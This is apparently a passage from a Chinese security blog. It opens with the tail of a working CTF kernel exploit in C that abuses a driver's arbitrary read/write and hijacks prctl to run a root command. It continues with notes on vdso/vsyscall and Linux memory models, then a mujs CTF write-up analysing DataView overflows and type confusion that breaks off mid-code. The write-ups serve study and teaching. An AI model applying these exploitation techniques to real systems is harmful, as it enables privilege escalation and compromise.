#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void error(const char* msg)
{
    perror(msg);
    exit(-1); 
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    write_channel.id = channel_id;
    write_channel.buf = (char*)write_buff;
    write_channel.count = len;
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);  
}

int main()
{
    int fd, channel_id;
    struct alloc_channel_args alloc_channel;
    struct shrink_channel_args shrink_channel;
    uint64_t addr;
    uint32_t result;
    int* read_buff = 0;
    uint32_t i;
    uint64_t vdso_addr = 0;

    setbuf(stdout ,0);

    fd = open("/proc/simp1e", O_NONBLOCK);
    if(fd == -1)
        error("open dev error");

    alloc_channel.buf_size = 0x100;
    alloc_channel.id = -1;
    ioctl(fd, CSAW_ALLOC_CHANNEL, &alloc_channel);

    if(alloc_channel.id == -1 )
        error("alloc channel error");
    else
        printf("channel id: %d\n",alloc_channel.id);

    channel_id = alloc_channel.id;

    shrink_channel.id = channel_id;
    shrink_channel.size = 0x100 + 1;
    ioctl(fd, CSAW_SHRINK_CHANNEL, &shrink_channel);;

    for(addr=0xffffffff80000000; addr<0xffffffffffffefff; addr+=0x1000) {
        RAA(fd, channel_id, &read_buff, addr, 8);
        if (read_buff == 0x010102464c457f) {
            printf("find it: %p\n",addr);
            vdso_addr = addr;
            break;
        }
    }

    if(vdso_addr==0)
        error("can't find vdso_bsae");

    uint64_t kernel_base = vdso_addr - 0x1020000;
    printf("[+] kernel base addr: %lp\n", kernel_base);

    uint64_t poweroff_work_func_offset = 0x9c4c0; 
    uint64_t poweroff_cmd_offset = 0x123d1e0;
    uint64_t prctl_hook_offset = 0x124fd00;
    uint64_t poweroff_work_func_addr = kernel_base + poweroff_work_func_offset;
    uint64_t poweroff_cmd_addr = kernel_base + poweroff_cmd_offset;
    uint64_t task_prctl_hook_addr = kernel_base + prctl_hook_offset;

    char arbitrary_command[] = "/bin/chmod 777 /flag";
    WAA(fd, channel_id, arbitrary_command, poweroff_cmd_addr, strlen(arbitrary_command));
    WAA(fd, channel_id, &poweroff_work_func_addr, task_prctl_hook_addr, 8);

    prctl(0 ,2, 0, 0,2);
    printf("flag: ");
    system("cat flag");

    return 0;
}

小结：

第一次遇到 HijackPrctl，最后的 exp 参考了下 raycp 大佬的思路

Linux vdso&vsyscall

Posted on 2022-10-03 In Knowledge 3.2k 3 mins.

基础知识

随便用 GDB 调试一个 ELF 文件，使用 vmmap 命令就可以找到它们：

    0x7ffff7fc9000     0x7ffff7fcd000 r--p     4000 0      [vvar]
    0x7ffff7fcd000     0x7ffff7fcf000 r-xp     2000 0      [vdso]
    0x7ffff7fcf000     0x7ffff7fd0000 r--p     1000 0      /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7fd0000     0x7ffff7ff3000 r-xp    23000 1000   /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ff3000     0x7ffff7ffb000 r--p     8000 24000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000 2c000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000 2d000  /usr/lib/x86_64-linux-gnu/ld-2.31.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000 0      [anon_7ffff7ffe]
    0x7ffffffde000     0x7ffffffff000 rw-p    21000 0      [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000 0      [vsyscall]

vsyscall：第一种也是最古老的一种用于加快系统调用的机制
- 它提供了一种在用户空间下快速执行系统调用的方法
- Linux 内核在用户空间映射一个包含一些变量及一些系统调用的实现的内存页，对特定的系统调用使用函数调用进行代替（不必切换到内核态）
vdso(virtual dynamic shared object)：vdso 是用来代替 vsyscall 的
- vsyscall 区域太小了，而且映射区域固定，有安全问题（为了兼容性考虑，vsyscall 还是存在）
- vdso 其实是一个动态库，它由内核提供，映射到每个进程的地址空间，它将提供一些函数调用来替代系统调用
- 本质上 vdso 是一段内核空间的代码，映射给用户态使其更快地调用系统调用
vvar：存放数据的地方，vdso 中的函数会使用 vvar 中的数据

vsyscall

Intel 最先实现了专门的快速系统调用指令 sysenter 和系统调用返回指令 sysexit
AMD 针锋相对地实现了另一组专门的快速系统调用指令 syscall 和系统调用返回指令 sysret

vsyscall 机制的核心就在于：通过调用 __kernel_vsyscall 来确定到底应该执行 syscall/sysret 指令还是 sysenter/sysexit 指令

__kernel_vsyscall 是一个特殊的页，其位于内核地址空间，但也是唯一允许用户访问的区域，该区域的地址固定为 0xffffffffff600000（64位系统），大小固定为4K（所有的进程都共享内核映射）
__kernel_vsyscall 属于内核数据，用户态程序只能通过 ELF 辅助向量来获取其基地址（具体来说是 AT_SYSINFO）
在ELF辅助向量中找到 AT_SYSINFO 后，就会像传统系统调用一样，将系统调用号和参数写入寄存器中，调用 __kernel_vsyscall 函数（由它来判断执行 syscall 还是 sysenter）

vsyscall 还可以对特定的系统调用使用函数调用进行代替，在 Linux 路径 /usr/include/asm/vsyscall.h 中可以看到如下代码：

/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _ASM_X86_VSYSCALL_H
#define _ASM_X86_VSYSCALL_H

enum vsyscall_num {
	__NR_vgettimeofday, 
	__NR_vtime,
	__NR_vgetcpu,
};

#define VSYSCALL_ADDR (-10UL << 20)

#endif /* _ASM_X86_VSYSCALL_H */

vsyscall 机制支持的系统调用有3个：

gettimeofday()：把时间包装为一个结构体返回，包括秒，微妙，时区等信息
time()：获取当前的系统时间，返回一个大整数
getcpu()：获取CPU信息

这些函数都有一个特点：Root 用户和普通用户都会获得相同的结果（不存在安全问题）

在内核与用户态之间建立一段共享内存区域，由内核定期“推送”最新值到该共享内存区域
当用户态程序在调用这些系统调用的时候，库函数并不真正执行系统调用，而是通过 vsyscall page（我们在GDB中看到的就是这个）来读取该数据的最新值
将系统调用改造成了函数调用，直接提升了执行性能（减少了内核的开销）

vdso

vdso 是用来代替 vsyscall 的，它们的区别如下：

vdso 本质上是一个ELF共享目标文件，而 vsyscall 只是一段内存代码和数据
vsyscall 位于内核地址空间，采用静态地址映射方式，而 vdso 借助共享目标文件天生具有的 PIC 特性，可以以进程为粒度动态映射到进程地址空间中

通过 ldd 命令就可以轻松找到 vdso：

➜  exp ldd /bin/sh
	linux-vdso.so.1 (0x00007ffe04dee000) # target
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f70dd181000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f70dd3ad000)

vdso mapping 的本体是一个ELF共享目标文件
源码位于 Linux 内核，路径为 /arch/x86/entry/vdso
其中包括一小段汇编代码，一些C源文件和一个链接器脚本

vdso 同样也拥有替代系统调用的能力，相关代码如下：（在上述路径的 vdso.lds.S 文件中）

/*
 * This controls what userland symbols we export from the vDSO.
 */
VERSION {
	LINUX_2.6 {
	global:
		clock_gettime;
		__vdso_clock_gettime;
		gettimeofday;
		__vdso_gettimeofday;
		getcpu;
		__vdso_getcpu;
		time;
		__vdso_time;
	local: *;
	};

vdso 机制支持的系统调用有4个：

gettimeofday()：把时间包装为一个结构体返回，包括秒，微妙，时区等信息
time()：获取当前的系统时间，返回一个大整数
getcpu()：获取CPU信息
clock_gettime()：用于计算精度和纳秒

其实现原理和 vsyscall 有所不同：

当一个程序被加载时，动态链接器和加载器便会加载程序依赖的动态链接对象，也包括 vdso
当 glibc 解析ELF头部时，会存储有关于 vdso 的一些位置信息，也包括简短的 stub 函数，用来在真正执行系统调用前搜索 vdso 中的符号名
在 glibc 中的代码会在 vdso 中搜索对应的函数并且返回其地址，真正发挥作用的代码就被包装在 vdso 而不是在内核里，当然也就不需要系统调用了
vdso 需要用到的内核信息由 vvar mapping 提供，vdso 本身的地址则依靠 ELF 辅助向量进行传递（具体来说是 AT_SYSINFO_EHDR）

参考：

Linux 内存模型简析

Posted on 2022-10-02 In Knowledge 2.6k 2 mins.

memory model

在 Linux 内核中支持3种内存模型，分别为：

flat memory model（平坦内存模型）
discontiguous memory model（不连续内存模型）
sparse memory model（稀疏内存模型）

所谓 memory model（内存模型），其实就是从 CPU 的角度看其物理内存的分布情况，代表了在 Linux Kernel 中，使用什么的方式来管理这些物理内存（某些体系架构支持多种内存模型，但在内核编译构建时只能选择使用一种内存模型）

程序分段和 CPU 内存分段是不同的概念

在 include/asm-generic/memory_model.h 中，Linux 为每个 memory model 准备了如下的宏定义：

1 2	#define page_to_pfn __page_to_pfn /* 虚拟内存->物理内存 / #define pfn_to_page __pfn_to_page / 物理内存->虚拟内存 */

用于把虚拟内存中的 struct page 和切分后的物理内存 page frame 关联起来

Flat memory model（平坦内存模型）

平坦内存模型是相对于多段模型而言的

8086实模式CPU的16位寄存器最多只能在一个内存段的64kb空间内寻址，要是超过64kb，它只能先变换段基址，来达到长距离取指的目的
平坦模型至始至终只有一个段，它能直接访问内存空间，不用再进行段基址的变换

1
2
3

#define __pfn_to_page(pfn)	(mem_map + ((pfn) - ARCH_PFN_OFFSET))
#define __page_to_pfn(page)	((unsigned long)((page) - mem_map) + \
				 ARCH_PFN_OFFSET)

图示：

对于 flat memory model 来说，物理内存本身是连续的
如果不连续的话，那么中间一部分物理地址是没有对应的物理内存，就会形成一个个洞，这就浪费了 mem_map 数组本身占用的内存空间

其特点如下：

内存连续且不存在空隙
通常应用于 UMA 系统（一致内存访问）
通过 CONFIG_FLATMEM 进行配置

Discontiguous memory model（不连续内存模型）

如果CPU在访问物理内存的时候，其地址空间是有一些空洞的，是不连续的，那么这种计算机系统的内存模型就是 discontiguous memory model

discontiguous memory model 是为了 NUMA 系统设计的（非一致内存访问）
NUMA 系统中每个 CPU 都有自己的本地内存，CPU 访问本地内存不用过总线，因而速度要快很多，每个 CPU 和内存在一起，称为一个 NUMA 节点
NUMA 中的每个节点 Node 用一个 pglist_data 的结构体表示

#define __pfn_to_page(pfn)			\
({	unsigned long __pfn = (pfn);		\
	unsigned long __nid = arch_pfn_to_nid(__pfn);  \
	NODE_DATA(__nid)->node_mem_map + arch_local_page_offset(__pfn, __nid);\
})

#define __page_to_pfn(pg)						\
({	const struct page *__pg = (pg);					\
	struct pglist_data *__pgdat = NODE_DATA(page_to_nid(__pg));	\
	(unsigned long)(__pg - __pgdat->node_mem_map) +			\
	 __pgdat->node_start_pfn;					\
})

图示：

由于每个 CPU 都有自己的本地内存，导致了物理内存必然有一些空洞

其特点如下：

多个内存节点不连续并且存在空隙
适用于 UMA 系统和 NUMA 系统
通过 CONFIG_CONTIGMEM 配置

随着 sparse memory model 的提出，这种内存模型也逐渐被弃用了（ARM在2010年已经移除了对 discontiguous memory model 的支持）

Sparse memory model（稀疏内存模型）

sparse memory model 是为了解决 discontiguous memory model 存在的弊端，而被提出的

连续的地址空间按照 section 被分成一段一段的，其中每一个 section 都是 Hotplug 的，因此内存地址空间可以被切分的更细，支持更离散的不连续内存
被管理的物理内存由一个个任意大小的 mem_section 构成，因此整个物理内存可被视为一个 mem_section 数组，每个 mem_section 包含了一个间接指向 page 数组的指针

#define __page_to_pfn(pg)					\
({	const struct page *__pg = (pg);				\
	int __sec = page_to_section(__pg);			\
	(unsigned long)(__pg - __section_mem_map_addr(__nr_to_section(__sec)));	\
})

#define __pfn_to_page(pfn)				\
({	unsigned long __pfn = (pfn);			\
	struct mem_section *__sec = __pfn_to_section(__pfn);	\
	__section_mem_map_addr(__sec) + __pfn;		\
})

图示：

其特点如下：

多个内存区域不连续并且存在空隙
以 section 为单位管理 online 和 hot-plug 内存
支持内存热插拔(hot plug memory)，但性能稍逊色于 DISCONTIGMEM
在x86或ARM64内存采用该中模型，其性能比 DISCONTIGMEM 更优并且与 FLATMEM 相当
对于ARM64平台默认选择该内存模型
通过 CONFIG_SPARSEMEM 配置

平台内存模型支持

系统架构	FLATMEM	DISCONTIGMEM	SPARSEMEM
ARM	默认	不支持	某些系统可选配置
ARM64	不支持	不支持	默认
x86_32	默认	不支持	可配置
x86_32(NUMA)	不支持	默认	可配置
x86_64	不支持	不支持	默认
x86_64(NUMA)	不支持	不支持	默认

参考：linux内存模型)

JavaScript pwn+类型混淆

Posted on 2022-10-01 In Reappearance 15k 14 mins.

mujs 复现

没有遇见过的 pwn

1	GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.3) stable release version 2.31

根据题目信息，先学习 mujs 是什么东西

MuJs 简述

MuJS 是一个轻量级的 JavaScript 解释器，用于嵌入到其他的软件中提供脚本执行功能，使用可移植 C 编写，实现了 ECMA-262 规定的 ECMAScript 标准

MuJS 包含一个简单的可执行程序 mujs，它通过调用 MuJS 库提供一套标准的 javascript 解释器，作为 javasript 的交互终端或者批处理命令执行平台

1
2
3

➜  release ./mujs
Welcome to MuJS 1.2.0.
>

启动解释器 mujs 后，可以输入 JavaScript 代码

mujs: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/tools/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=27979cb2ff1c7a6765b5243c3aaad6c609e88108, stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

64位，dynamically，全开

先通过题目给的哈希下载 MuJS 源码：

1	dd0a0972b4428771e6a3887da2210c7c9dd40f9c

链接：An embeddable Javascript interpreter in C
使用 make debug 生成有符号的文件，可以开始调试

使用 diff 命令对比源码和题目文件的差异，找出需要分析的目标：

➜  桌面 diff mujs susctf2022_mujs 
只在 susctf2022_mujs 存在：build # ignore
mujs/docs 和 susctf2022_mujs/docs 有共同的子目录
只在 mujs 存在：.gitattributes # ignore
只在 mujs 存在：.gitignore # ignore
diff --color mujs/jsbuiltin.c susctf2022_mujs/jsbuiltin.c
diff --color mujs/jsbuiltin.h susctf2022_mujs/jsbuiltin.h
diff --color mujs/jscompile.c susctf2022_mujs/jscompile.c
只在 susctf2022_mujs 存在：jsdataview.c # target
diff --color mujs/jsdump.c susctf2022_mujs/jsdump.c
diff --color mujs/jsgc.c susctf2022_mujs/jsgc.c
diff --color mujs/jsi.h susctf2022_mujs/jsi.h
diff --color mujs/jsobject.c susctf2022_mujs/jsobject.c
diff --color mujs/json.c susctf2022_mujs/json.c
diff --color mujs/jsstate.c susctf2022_mujs/jsstate.c
diff --color mujs/jsvalue.h susctf2022_mujs/jsvalue.h
diff --color mujs/main.c susctf2022_mujs/main.c
diff --color mujs/mujs.h susctf2022_mujs/mujs.h
diff --color mujs/one.c susctf2022_mujs/one.c
diff --color mujs/pp.c susctf2022_mujs/pp.c
diff --color mujs/regexp.c susctf2022_mujs/regexp.c
mujs/tools 和 susctf2022_mujs/tools 有共同的子目录

可以发现以上这些模块或多或少都有差异，不知道是版本问题还是魔改了源码
只在 susctf2022_mujs 存在：jsdataview.c，先重点分析这个文件

Bindiff 恢复符号

由于题目给出了源码，可以用 Bindiff 的 IDA 插件来获取源文件的符号

先利用题目给出的代码编译一个有符号的文件：

1	make debug

在 IDA 中使用 Bindiff 插件：

注意：Bindiff 不支持中文路径

选中需要恢复的符号，然后选择导入（一般选择相似度在 0.8 以上的函数，但这个题目推荐用字符串来定位函数位置）

JavaScript 数据类型

值类型(基本类型)：字符串(String)，数字(Number)，布尔(Boolean)，空(Null)，未定义(Undefined)，Symbol

引用数据类型(对象类型)：对象(Object)，数组(Array)，函数(Function)，正则(RegExp)，日期(Date)

将变量的值设置为空 Null 来清空变量
未定义 Undefined 表示变量不含有值
对象也是一个变量，但对象可以包含多个值（多个变量），每个值以 name:value 对呈现

1	var person = {firstName:"John", lastName:"Doe", age:50, eyeColor:"blue"};

所有的 JavaScript 变量都是对象，数组元素是对象，函数是对象
因此，你可以在数组中有不同的变量类型，你可以在一个数组中包含对象元素、函数、甚至是其它数组：

var myCars=new Array("Saab","Volvo","BMW");
var myArray=new Array();
myArray[0]=Date.now; // 对象元素
myArray[1]=myFunction; // 函数
myArray[2]=myCars; // 数组

JavaScript 类型系统

我们经常用两个维度去描述一个编程语言的特性：

强类型与弱类型，这是从 类型安全 的维度分类
静态类型与动态类型，这是从 类型检查 的维度分类

强类型 ：要求语言层面限制函数的实参类型必须与形参类型相同

弱类型 : 语言层面不会限制实参的类型

下面是一个例子，用于对比强类型的 Java 和弱类型的 JavaScript：

// Java(强类型)
class Main {
    // 这里定义了传入的参数是int类型，那么实际的时候也应该是int类型
    static void foo(int num) {
        System.out.printIn(num);
    }
    
    public static void main(Sting[] args) {
        // 下面的如果int类型就通过，如果不是int类型就会报错
        Main.foo(100); // ok
        Main.foo('100'); // error "100" is a string
        Main.foo(Integer.parseInt("100")); // ok
    }
}

// JavaScript(弱类型)
function foo(num) {
    // 传的时候没有规定是什么类型，那么实参是什么类型都不会报错
    console.log(num)
}

foo(100) // ok
foo('100') // ok
foo(parseInt('100')) // ok

强类型语言中不允许有任何的隐式类型转换，而弱类型语言则允许任意的数据隐式类型转换

静态类型：一个变量声明时它的类型就是明确的，声明过后，类型不能修改

动态类型：运行阶段才可以明确变量的类型，而且变量的类型随时可以改变。所以动态类型语言中的变量没有类型，变量中存放的值时有类型的

下面举个例子：

// Java(静态类型)
class Main {
    public static void main(String[] args) {
        // 一开始就定了num的类型是int,不能修改成string
        int num = 100;
        num = 50; // ok
        num = '100' // error
        System.out.printInt(num);
    }
}

// JavaScript(动态类型)
var num = 100
// 可以随意修改num的类型
num = 50 // ok
num = '100' // ok
num = true // ok
console.log(num)

JavaScript 是一个弱类型且动态类型的语言

参考：JavaScript类型系统

JavaScript 构造函数

有时我们需要创建相同“类型”的许多对象的“蓝图”（类似于C语言中的结构体）

function Person(first, last, age, eye) {
    this.firstName = first;
    this.lastName = last;
    this.age = age;
    this.eyeColor = eye;
}

在 JavaScript 中，被称为 this 的事物是代码的“拥有者”
在构造器函数中，this 是没有值的，它是新对象的替代物，当一个新对象被创建时，this 的值会成为这个新对象（有点像 python 中的 self）

创建一种“对象类型”的方法，是使用对象构造器函数，在上面的例子中，函数 Person() 就是对象构造器函数

通过 new 关键词调用构造器函数可以创建相同类型的对象：

1 2	var myFather = new Person("Bill", "Gates", 62, "blue"); var myMother = new Person("Steve", "Jobs", 56, "green");

构造器函数中也可以定义方法：

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.changeName = function (name) {
        this.lastName = name;
    };
}

1 2	var myFriend = new Person("Bill", "Gates", 62, "blue"); myFriend.changeName("Jobs");

通过用 myFriend 替代 this，JavaScript 可以获知目前处理的哪个 person

构造函数中的资源浪费：

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.changeName = function (name) {
        this.lastName = name;
    };
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.changeName == p2.changeName) // false

实例对象 p1，p2 拥有完全一样的内容，但是其属性方法却是不同的
关键字 function 需要在 heap 中开辟一片空间，用于存放 function 的代码，然后把这片地址返回出去
两个实例对象 p1，p2 导致一模一样 function 被重复写入了两次，这就造成了资源浪费

常规解决办法：

使用全局函数：可以直接把 function 变为全局函数，在构造函数中赋值其地址就行了，但这种方法会污染全局变量
使用对象：把这些全局函数用一个专业的对象组织起来，这些函数就变成这个对象的属性了

let obj = {
    fn1: function(){
        console.log('chunk1')
    },
    fn2: function(){
        console.log('chunk2')
    },
    fn3: function(){
        console.log('chunk3')
    },
}

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.fun1 =obj.fn1
    this.fun2 =obj.fn2
    this.fun3 =obj.fn3
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.fun1 == p2.fun1) // true

这种方法可以避免资源浪费，也可以防止全局变量污染，但它自己还是会污染全局变量
为了解决这个问题，JavaScript 会为每个构造器创建一个原型对象，这个原型对象可以起到和上述 obj 对象一样的作用
PS：原型对象不是对象，而是属性

JavaScript 原型对象

在 JavaScript 中每个构造器（函数）都有一个内置属性叫 prototype，它叫原型，也是个对象，我们叫这个对象为原型对象

在 Chrome 浏览器中按 Ctrl+Shift+J 启动控制台，创建一个对象并查看其属性：

可以发现该对象中有一个 [[prototype]] 属性，指向该属性的原型对象 String

继续展开 [[prototype]]，发现它也有 [[prototype]] 属性，指向 String 的原型对象 Object

这些就很清晰了，每一个对象都有一个内置属性叫 prototype，指向该属性的原型对象（Object 没有 prototype，因为 Object 是所有对象的基础），所有的 JavaScript 对象都会从一个 prototype（原型对象）中继承属性和方法：

Date 对象从 Date.prototype 继承
Array 对象从 Array.prototype 继承
Person 对象从 Person.prototype 继承
所有 JavaScript 中的对象都是位于原型链顶端的 Object 的实例

如果上述案例不使用全局对象 obj，而是使用原型对象的话，代码如下：

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
}

Person.prototype.fun1 = function(){
    console.log('chunk1')
}
Person.prototype.fun2 = function(){
    console.log('chunk2')
}
Person.prototype.fun3 = function(){
    console.log('chunk3')
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.fun1 == p2.fun1) // true

打印 p1 的信息如下：

fun1，fun2，fun3 都在 [[prototype]]（Person.prototype）中，并且会被 Person 继承

JavaScript new 一个对象的过程：

创建一个空对象
将空对象的原型指向构造函数的原型（继承函数的原型）
将属性和方法添加至这个对象（改变 this 各个条目的指向）
对构造函数返回值的处理判断（忽略返回的基本类型，只返回引用类型）

案例，以下代码可以模拟 new 的过程，产生和 new 一样的效果：

function Fun(age,name){
    this.age = age;
    this.name = name;
}

function create(fn, ...args){
    var obj = {}; // 创建一个空对象
    Object.setPrototypeOf(obj,fn.prototype) // 将空对象的原型指向构造函数的原型
    var result = fn.apply(obj,args); // 将属性和方法添加至这个对象
    return result instanceof Object ? result : obj; // 对构造函数返回值的处理判断
}

console.log(new Fun(18,'yhellow'))
console.log(create(Fun,18,'yhellow'))

DataView 视图

DataView 视图是一个可以从 ArrayBuffer 对象中读写多种数值类型的底层接口，在读写时不用考虑平台字节序问题

1	new DataView(buffer [, byteOffset [, byteLength]])

buffer：一个 ArrayBuffer 或 SharedArrayBuffer 对象，DataView 对象的数据源
byteOffset：可选，此 DataView 对象的第一个字节在 buffer 中的偏移，如果不指定则默认从第一个字节开始
byteLength：可选，此 DataView 对象的字节长度，如果不指定则默认与 buffer 的长度相同

PS：后来发现题目中的 DataView 和 DataView 视图没有多大的关系，题目的 DataView 有点像作者为 mujs 写的插件，内在逻辑都是自定义的

参考：DataView (DataView) - JavaScript 中文开发手册

漏洞分析

程序的代码量有点大，但通过 diff 命令可以得到 jsdataview.c 文件是题目独有的，漏洞点极有可能在这里

static void Dv_setUint8(js_State *J)
{
	js_Object *self = js_toobject(J, 0);
	if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView");
	size_t index = js_tonumber(J, 1);
	uint8_t value = js_tonumber(J, 2);
	if (index < self->u.dataview.length+0x9) { /* target */
		self->u.dataview.data[index] = value;
	} else {
		js_error(J, "out of bounds access on DataView");
	}
}

static void Dv_getUint32(js_State *J)
{
	js_Object *self = js_toobject(J, 0);
	if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView");
	size_t index = js_tonumber(J, 1);
	if (index+3 < self->u.dataview.length) { /* target */
		js_pushnumber(J, *(uint32_t*)&self->u.dataview.data[index]);
	} else {
		js_pushundefined(J);
	}
}

setUintN 用于将无符号的N位整数存储在指定位置
getUintN 用于获取存储在指定位置的无符号N位整数

漏洞点还是比较明显的：

Dv_setUint8 向后溢出 9 字节
Dv_getUint32 向前溢出 3 字节

但是要真正利用这个漏洞，还必选理解程序的功能：

void jsB_initdataview(js_State *J)
{
	js_pushobject(J, J->DataView_prototype);
	{
		jsB_propf(J, "DataView.prototype.getUint8", Dv_getUint8, 1);
		jsB_propf(J, "DataView.prototype.setUint8", Dv_setUint8, 2);
		jsB_propf(J, "DataView.prototype.getUint16", Dv_getUint16, 1);
		jsB_propf(J, "DataView.prototype.setUint16", Dv_setUint16, 2);
		jsB_propf(J, "DataView.prototype.getUint32", Dv_getUint32, 1);
		jsB_propf(J, "DataView.prototype.setUint32", Dv_setUint32, 2);
		jsB_propf(J, "DataView.prototype.getLength", Dv_getLength, 0);
	}
	js_newcconstructor(J, jsB_new_DataView, jsB_new_DataView, "DataView", 0);
	js_defglobal(J, "DataView", JS_DONTENUM);
}

有点类似于“注册函数”，把 JavaScript 层函数名称和 C 层的具体函数进行绑定
设置了创建函数 jsB_new_DataView

static void jsB_new_DataView(js_State *J) {
	int top = js_gettop(J);
	size_t size;

	if (top != 2) {
		js_typeerror(J, "new DataView expects a size");
	}
	size = js_tonumber(J, 1);

	js_Object *obj = jsV_newobject(J, JS_CDATAVIEW, J->DataView_prototype);
	obj->u.dataview.data = js_malloc(J, size);
	memset(obj->u.dataview.data, 0, size);
	obj->u.dataview.length = size;
	js_pushobject(J, obj);
}

创建了一个 js_Object 结构体，js_malloc 申请了一个堆块

类型混淆+堆风水

先看看 js_Object 结构体中的内容：

struct js_Object
{
	enum js_Class type;
	int extensible;
	js_Property *properties;
	int count; /* number of properties, for array sparseness check */
	js_Object *prototype;
	union {
		int boolean;
		double number;
		struct {
			const char *string;
			int length;
		} s;
		struct {
			int length;
		} a;
		struct {
			js_Function *function;
			js_Environment *scope;
		} f;
		struct {
			const char *name;
			js_CFunction function;
			js_CFunction constructor;
			int length;
			void *data;
			js_Finalize finalize;
		} c;
		js_Regexp r;
		struct {
			js_Object *target;
			js_Iterator *head;
		} iter;
		struct {
			const char *tag;
			void *data;
			js_HasProperty has;
			js_Put put;
			js_Delete delete;
			js_Finalize finalize;
		} user;
		struct {
		    uint32_t length;
		    uint8_t* data;
		} dataview;
	} u;
	js_Object *gcnext; /* allocation list */
	js_Object *gcroot; /* scan list */
	int gcmark;
};

js_Object 的第一个字节可以被覆盖，而它表示该对象的类型
因此必须用堆风水把有溢出的 dataview.data 申请到 js_Object 前面

在此之前先分析一下程序的流程：

main：注释掉了大部分的内置函数，只留下了个 print，控制权交给 js_dofile
js_dofile：调用 js_loadfile 设置栈，调用 js_call 运行代码
js_call：从栈中获取 obj，然后这个 obj 就是要调用的函数，最后进入 jsR_run
jsR_run：获取 opcode 并执行，C层的代码会通过 jsR_callcfunction 进行调用

测试样例：

b = DataView(0x68);
a = DataView(0x48);
b = DataView(0x48);
c = DataView(0x48);
e = DataView(0x48);
f = DataView(0x1000 * 0x1000);
/* jsB_new_DataView:0x555555571870 */
/* Dv_setUint8:0x555555577680 */

首次执行 jsB_new_DataView 堆环境很乱，这是因为程序在 jsB_init 中对各种类型进行了初始化，导致 heap 出现了许多 free chunk 和 tcache，扰乱了后续的分配
PS：Bindiff 对 jsB_new_DataView 的识别不是很到位，所以这里推荐用字符串来定位该函数

Allocated chunk | PREV_INUSE
Addr: 0x5555555c2af0 /* dataview.data */ 
Size: 0x51

Allocated chunk | PREV_INUSE
Addr: 0x5555555c2b40 /* js_Object */
Size: 0x71

pwndbg> telescope 0x5555555c2b40
00:0000│  0x5555555c2b40 ◂— 0x0
01:0008│  0x5555555c2b48 ◂— 0x71 /* 'q' */
02:0010│  0x5555555c2b50 ◂— 0x100000010 /* type:dataview */
03:0018│  0x5555555c2b58 —▸ 0x55555559b0a0 —▸ 0x555555585089 ◂— 0x6d6172676f727000
04:0020│  0x5555555c2b60 ◂— 0x0
05:0028│  0x5555555c2b68 —▸ 0x5555555a5780 ◂— 0x100000010
06:0030│  0x5555555c2b70 ◂— 0x48 /* length */
07:0038│  0x5555555c2b78 —▸ 0x5555555c2bc0 ◂— 0x0

可以利用漏洞修改 js_Object->type，从而造成类型混淆
核心思路就是：利用 js_Object 的联合体中，占用相同内存位置的其他类型字符来修改 js_Object.u.dataview.length，导致更大的堆溢出
联合体中的 js_Object.u.dataview.length js_Object.u.c.name js_Object.u.number 占用同一内存位置（由于指针需要8字节对齐，dataview.length 在联合体中应该占用8字节，因此不用担心覆盖后面的 dataview.data）

static void js_setdate(js_State *J, int idx, double t)
{
        js_Object *self = js_toobject(J, idx);
